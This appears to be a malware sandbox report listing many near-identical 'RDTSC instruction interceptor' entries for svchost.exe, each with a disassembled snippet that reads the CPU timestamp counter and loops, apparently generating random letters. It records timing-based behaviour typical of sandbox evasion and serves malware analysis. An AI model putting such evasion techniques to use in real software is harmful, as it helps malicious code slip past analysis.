Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA594B5h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FB36h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59150h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59804h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA597D3h 0x00000031 call 2AA4FEF6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59810h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59124h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA597D3h 0x00000033 call 2AA4F9F6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA594F0h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59453h 0x00000033 call 2AA4FD36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59810h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59684h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA597D3h 0x00000033 call 2AA4FB96h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59490h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59684h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59813h 0x00000031 call 2AA4FEB6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59810h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59684h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA598B3h 0x00000031 call 2AA4FBF6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59490h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59804h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA598B3h 0x00000033 call 2AA4FB36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59490h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59124h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA597D3h 0x00000031 call 2AA4FEB6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59250h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59804h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59213h 0x00000031 call 2AA4FB36h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA598F0h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA594E4h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA597D3h 0x00000033 call 2AA4FD36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59490h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA596B5h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FF96h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59690h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59653h 0x00000033 call 2AA4FB36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA594F0h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59835h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FB36h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59490h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59453h 0x00000033 call 2AA4FB36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59490h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59175h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FD36h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA594F0h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59804h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA597D3h 0x00000033 call 2AA4FB96h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59810h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59835h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FB36h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59690h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA597D3h 0x00000033 call 2AA4FD36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59490h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59275h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FEB6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59690h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA591C4h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59653h 0x00000033 call 2AA4FF96h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59810h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59544h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA597D3h 0x00000031 call 2AA4FB36h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59490h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59453h 0x00000033 call 2AA4FB36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59490h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59835h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FBF6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59810h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
